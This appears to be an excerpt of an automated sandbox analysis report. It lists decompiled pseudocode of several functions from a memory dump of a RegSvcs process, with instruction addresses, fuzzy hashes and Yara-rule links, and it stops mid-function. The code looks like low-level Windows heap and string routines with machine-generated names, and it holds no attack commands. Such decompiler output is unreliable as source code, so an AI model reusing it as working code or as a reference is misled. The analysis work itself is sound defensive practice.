								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E01036B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E01036B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E01036B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E01036B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E00FD7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E00FF9AE0();
								L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L00FD2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L00FD2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L00FD2400( &_v52);
							}
							if(_v28 >= 0) {
								return L00FD2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x01036dd4
0x01036dde
0x01036de1
0x01036de3
0x01036de6
0x01036de9
0x01036dec
0x01036def
0x01036df2
0x01036df5
0x01036dfe
0x01036e04
0x01036e09
0x01036e0d
0x01036e18
0x01036e1b
0x01036e22
0x01036e2d
0x01036e30
0x01036e36
0x01036e42
0x01036e4d
0x01036e50
0x01036e55
0x01036e5c
0x01036e6e
0x01036e5e
0x01036e67
0x01036e67
0x01036e73
0x01036e74
0x01036e77
0x01036e7c
0x01036e7d
0x01036e8e
0x01036e93
0x01036e9c
0x01036ea8
0x01036eab
0x01036eac
0x01036eb3
0x01036ecd
0x01036edc
0x01036ee2
0x01036ee5
0x01036ef2
0x01036efb
0x01036f01
0x01036f06
0x01036f0b
0x01036f11
0x01036f1a
0x01036f22
0x01036f26
0x01036f26
0x01036f33
0x01036f41
0x01036f44
0x01036f47
0x01036f54
0x01036f65
0x01036f77
0x01036f7c
0x01036f82
0x01036f91
0x01036f99
0x01036fa3
0x01036fae
0x01036fae
0x01036fba
0x01036fbb
0x01036fbc
0x01036fc1
0x01036fc2
0x01036fd3
0x01036fd8
0x01036fd8
0x01036fdf
0x01036fe8
0x01036fee
0x01036fee
0x01036ff5
0x01036ffb
0x01036ffb
0x01037004
0x00000000
0x0103700a
0x01037004
0x01036eb3
0x01036e9c
0x01037015

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 72700358862c0fc1cb88ed6c2303bc0de886c99f3fa5e494fa402be6a9a1e116
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: BE718E71A00209EFCB11DFA9C984AEEFBB9FF88710F14416AE545E7251DB34EA41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FB52A5 Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00FB52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E00FCEEF0(0x10a79a0);
					_t104 =  *0x10a8210; // 0xb52c38
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x2e000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E00FCEB70(_t93, 0x10a79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E00FF9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E00FCEEF0(0x10a79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E00FCEB70(0, 0x10a79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0xb52c5002
								_t13 = _t104 + 0xc; // 0xb52c45
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E00FEF0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E00FCEEF0(0x10a79a0);
									__eflags =  *0x10a8210 - _t104; // 0xb52c38
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x10a8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x2000b52c
											_t95 =  *((intOrPtr*)( *_t37));
											E01034888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E00FCEB70(_t95, 0x10a79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E00FF95D0();
											L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E00FF95D0();
											L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E00FCEB70(_t93, 0x10a79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E00FF95D0();
										L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E00FF95D0();
										L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x2000b52c
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0xb52c5002
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E00FEF0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x00fb52a5
0x00fb52ad
0x00fb52b0
0x00fb52b3
0x00fb52b7
0x00fb52ba
0x00fb52bf
0x00fb52c4
0x00fb52cc
0x00000000
0x00000000
0x00fb52ce
0x00fb52d1
0x00fb52d9
0x00fb52dd
0x00fb52e7
0x00fb52f7
0x00fb52f9
0x00fb52fd
0x01010dcf
0x01010dd5
0x01010dd6
0x01010dd7
0x01010dd8
0x01010dd9
0x01010dde
0x01010ddf
0x01010de0
0x01010de1
0x01010de2
0x01010de2
0x01010de5
0x01010dea
0x01010dec
0x01010f60
0x01010f64
0x01010f70
0x01010f76
0x01010f79
0x01010f79
0x00000000
0x01010f64
0x01010df2
0x01010df7
0x01010e04
0x01010e04
0x01010e0d
0x01010e0d
0x01010e10
0x01010e1a
0x01010e1c
0x01010e4c
0x01010e52
0x01010e61
0x01010e67
0x01010e6b
0x01010e70
0x01010e76
0x01010ed7
0x01010edc
0x01010ee0
0x01010ee6
0x01010eea
0x01010eed
0x01010ef0
0x01010ef3
0x01010ef6
0x01010ef9
0x01010efb
0x01010efe
0x01010f01
0x01010f01
0x01010f0b
0x01010f12
0x01010f16
0x01010f18
0x01010f18
0x01010f1b
0x01010f2c
0x01010f31
0x01010f31
0x01010f35
0x01010f39
0x01010f3a
0x01010f3c
0x01010f3c
0x01010f3f
0x01010f50
0x01010f55
0x01010f55
0x01010f59
0x00fb52eb
0x00fb52f1
0x00fb52f1
0x01010e7d
0x01010e84
0x01010e88
0x01010e8a
0x01010e8a
0x01010e8d
0x01010e9e
0x01010ea3
0x01010ea3
0x01010ea7
0x01010eaf
0x01010eb3
0x01010eb9
0x01010eb9
0x01010ebc
0x01010ecd
0x01010ecd
0x00000000
0x01010eb3
0x01010e1e
0x01010e21
0x01010e25
0x01010e2b
0x01010e2f
0x01010e30
0x01010e3a
0x01010e3f
0x01010e41
0x00000000
0x00000000
0x01010e47
0x00000000
0x01010e47
0x01010df9
0x01010dfe
0x00000000
0x00000000
0x00000000
0x01010dfe
0x00fb5303
0x00fb5307
0x00000000
0x00fb5309
0x00000000
0x00fb5309
0x00fb5307
0x00fb52e9
0x00fb52e9
0x00000000
0x00fb52e9
0x00fb530e
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73f17919937ff3af030a1d872e718119d05bf3407eef663a0e5eb3ce3f9d69ff
Instruction ID: e514f73665afac23c5f4437e65b71e7092e221a56e76801936743a4fbd575562
Opcode Fuzzy Hash: 73f17919937ff3af030a1d872e718119d05bf3407eef663a0e5eb3ce3f9d69ff
Instruction Fuzzy Hash: 9B51CB311097429BD321AF69CD42B66BBE4BF40B10F14491EF4D587652E778E844DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00FE2AE4 Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FE2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x10a8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x10a8208; // 0x10a8207
				_t8 = _t57 + 0x10a8208; // 0x10a8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x10a8450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x10a821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x10a6d5c; // 0x7fd10654
							_t72 =  *0x10a6d5c; // 0x7fd10654
							_t75 =  *0x10a6d5c; // 0x7fd10654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x10a6d5c; // 0x7fd10654
							_t84 =  *0x10a6d5c; // 0x7fd10654
							_t87 =  *0x10a6d5c; // 0x7fd10654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E00FFF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x00fe2ae4
0x00fe2aec
0x00fe2aef
0x00fe2af4
0x00fe2af7
0x00fe2afd
0x00fe2b92
0x00fe2b92
0x00fe2b97
0x00fe2b9c
0x00fe2b9c
0x00fe2b03
0x00fe2b06
0x00fe2b09
0x00fe2b09
0x00fe2b0f
0x00fe2b15
0x00fe2b15
0x00fe2b1b
0x00fe2b1e
0x00fe2b21
0x00fe2b26
0x00fe2b29
0x00fe2b81
0x00fe2b84
0x00fe2c0e
0x00fe2c15
0x00fe2c24
0x00fe2c24
0x00fe2b8a
0x00fe2b8a
0x00fe2b8a
0x00fe2b8a
0x00fe2b90
0x00000000
0x00000000
0x00000000
0x00000000
0x00fe2b4a
0x00fe2b4a
0x00fe2b4d
0x00fe2b53
0x00000000
0x00000000
0x00fe2b55
0x00fe2b58
0x00fe2bb7
0x01025d1b
0x01025d37
0x01025d47
0x01025d53
0x00fe2bbd
0x00fe2bbd
0x00fe2bbd
0x00fe2bb7
0x00fe2b5d
0x00fe2c2f
0x01025d5b
0x01025d77
0x01025d87
0x01025d93
0x00fe2c35
0x00fe2c35
0x00fe2c35
0x00fe2c2f
0x00fe2b65
0x00fe2b9f
0x00fe2ba2
0x00fe2b67
0x00fe2b67
0x00fe2b69
0x00fe2b6b
0x00fe2b6e
0x00fe2bc9
0x00fe2bcc
0x00fe2bcf
0x00fe2bd4
0x00fe2bd6
0x00fe2bd6
0x00fe2bdb
0x00fe2c02
0x00fe2c05
0x00fe2c07
0x00000000
0x00fe2c07
0x00fe2be0
0x00fe2c00
0x00fe2c3f
0x00fe2c3f
0x00000000
0x00fe2c00
0x00fe2be5
0x00fe2be7
0x00fe2bec
0x00fe2bf4
0x00fe2bf6
0x00000000
0x00fe2bf6
0x00fe2b70
0x00fe2b76
0x00fe2b2b
0x00fe2b2b
0x00fe2b2d
0x00fe2b2f
0x00fe2b32
0x00fe2b35
0x00fe2b3a
0x00000000
0x00fe2b40
0x00fe2b43
0x00fe2b45
0x00fe2b47
0x00fe2b4a
0x00fe2b4d
0x00fe2b53
0x00000000
0x00000000
0x00000000
0x00fe2b53
0x00fe2b78
0x00fe2b78
0x00fe2b7b
0x00fe2b7e
0x00000000
0x00fe2b7e
0x00fe2b76
0x00fe2ba5
0x00fe2ba5
0x00fe2ba8
0x00fe2bad
0x00000000
0x00000000
0x00fe2baf
0x00fe2baf
0x00fe2bc2
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d66930dc72c0ed545e84a8fd60c92a06ce71933c83d48bf4208e6b644ee4bfd
Instruction ID: f79639dd2fb66d1d6a49421844944c004a91245d960ea3edb38d782f08a93d29
Opcode Fuzzy Hash: 5d66930dc72c0ed545e84a8fd60c92a06ce71933c83d48bf4208e6b644ee4bfd
Instruction Fuzzy Hash: 2551D176E001658FCB58DF1EC8809BDB7B5FBC8700715845AE886DB324E735AE51EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FE3C3E Relevance: .2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00FE3C3E(void* __ecx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v32;
				intOrPtr _v36;
				void* _v40;
				void* _v44;
				void* _v52;
				void* __ebx;
				signed char _t59;
				intOrPtr _t65;
				signed int _t67;
				void* _t75;
				signed char* _t78;
				intOrPtr _t79;
				signed int _t91;
				signed int _t104;
				void* _t127;
				signed int _t134;
				void* _t136;

				_t136 = (_t134 & 0xfffffff8) - 0x14;
				_t127 = __ecx;
				_v20 = 0;
				E00FE4E70(0x10a86d0, 0xfe5330, 0, 0);
				if(E00FE3FCD( &_v24) < 0 ||  *((intOrPtr*)(_t136 + 0x1c)) > 0xa) {
					_t59 = _v20;
				} else {
					_t59 = 3;
					_v20 = _t59;
				}
				_v20 = E00FE3F33(_t127, _t59);
				_v28 = 0;
				_push(E00FE0678(_t127, 1));
				_push(0x2000);
				_push( &_v20);
				_push(0);
				_push( &_v28);
				_push(0xffffffff);
				if(E00FF9660() < 0) {
					L16:
					_t65 = 0;
					goto L13;
				} else {
					if((_v20 & 0x00000001) != 0) {
						_t67 = 1;
					} else {
						_t67 =  *0x10a6240; // 0x4
					}
					_t104 = _t67 * 0x18;
					_t12 = _t104 + 0x7d0; // 0x7d1
					 *((intOrPtr*)(_t136 + 0x18)) = _t12;
					_push(E00FE0678(_t127, 1));
					_push(0x1000);
					_push(_t136 + 0x20);
					_push(0);
					_push( &_v24);
					_push(0xffffffff);
					if(E00FF9660() < 0) {
						 *((intOrPtr*)(_t136 + 0x18)) = 0;
						E00FE174B( &_v24, _t136 + 0x18, 0x8000);
						goto L16;
					} else {
						_t75 = E00FD7D50();
						_t132 = 0x7ffe0380;
						if(_t75 != 0) {
							_t78 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t78 = 0x7ffe0380;
						}
						if( *_t78 != 0) {
							_t79 =  *[fs:0x30];
							__eflags =  *(_t79 + 0x240) & 0x00000001;
							if(( *(_t79 + 0x240) & 0x00000001) == 0) {
								goto L10;
							}
							__eflags = E00FD7D50();
							if(__eflags != 0) {
								_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							}
							E01071582(_t104, _t127, _v24, __eflags,  *((intOrPtr*)(_t136 + 0x20)),  *(_t127 + 0x74) << 3,  *_t132 & 0x000000ff);
							E0107138A(_t104, _t127, _v36, _v24, 9);
							goto L10;
						} else {
							L10:
							E00FE3EA8(_t127, _v24, _v20);
							 *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1e4)) =  *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1e4)) + _v20;
							 *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1e8)) =  *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1e8)) +  *((intOrPtr*)(_t136 + 0x18));
							 *((intOrPtr*)(_v28 + 0x18)) = _v20 + _v28;
							 *((intOrPtr*)(_v28 + 0x14)) =  *((intOrPtr*)(_t136 + 0x18)) + _v28;
							_t35 = _v28 + 0x7d0; // 0x7d0
							 *((intOrPtr*)(_v28 + 0x10)) = _t35 + _t104;
							_t91 =  *0x10a84b4; // 0x0
							if((_t91 & 0x00000003) == 0) {
								 *0x10a84b4 = _t91 | 0x00000001;
								E00FE1129();
							}
							 *(_v24 + 0x1b8) = _v20;
							_t65 = _v24;
							L13:
							return _t65;
						}
					}
				}
			}

0x00fe3c46
0x00fe3c4e
0x00fe3c5c
0x00fe3c60
0x00fe3c70
0x00fe3c7d
0x010262a2
0x010262a4
0x010262a5
0x010262a5
0x00fe3c8b
0x00fe3c90
0x00fe3c99
0x00fe3c9a
0x00fe3ca3
0x00fe3ca4
0x00fe3ca9
0x00fe3caa
0x00fe3cb3
0x010262c5
0x010262c5
0x00000000
0x00fe3cb9
0x00fe3cbe
0x010262ce
0x00fe3cc4
0x00fe3cc4
0x00fe3cc4
0x00fe3cc9
0x00fe3cd1
0x00fe3cd7
0x00fe3ce0
0x00fe3ce1
0x00fe3cea
0x00fe3ceb
0x00fe3cf0
0x00fe3cf1
0x00fe3cfa
0x010262b7
0x010262c0
0x00000000
0x00fe3d00
0x00fe3d00
0x00fe3d05
0x00fe3d0c
0x010262dd
0x00fe3d12
0x00fe3d12
0x00fe3d12
0x00fe3d17
0x010262e7
0x010262ed
0x010262f4
0x00000000
0x00000000
0x010262ff
0x01026301
0x0102630c
0x0102630c
0x0102630c
0x01026327
0x01026338
0x00000000
0x00fe3d1d
0x00fe3d1d
0x00fe3d27
0x00fe3d37
0x00fe3d48
0x00fe3d58
0x00fe3d65
0x00fe3d6c
0x00fe3d74
0x00fe3d77
0x00fe3d7e
0x00fe3d83
0x00fe3d88
0x00fe3d88
0x00fe3d95
0x00fe3d9b
0x00fe3d9f
0x00fe3da5
0x00fe3da5
0x00fe3d17
0x00fe3cfa

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f0fcf37df44c2be320e7fef99955a4727f34d05e7161cb87ff5d407c0ab25a3
Instruction ID: dab30c9a801a0581299165ef44b210c926a30ec8ed6cf78e6cd6c29f6ed9ea48
Opcode Fuzzy Hash: 2f0fcf37df44c2be320e7fef99955a4727f34d05e7161cb87ff5d407c0ab25a3
Instruction Fuzzy Hash: C951B1716083819FC700DF29C848B6AB7E9FF84314F14492EF899CB292D775EA05DB92

Uniqueness

Uniqueness Score: -1.00%

Function 0107AE44 Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0107AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0107C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0107ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0107FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0107EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E00FD7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E01071608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E01081536(0x10a8ae4, (_t74 -  *0x10a8b04 >> 0x14) + (_t74 -  *0x10a8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0107C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0107A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
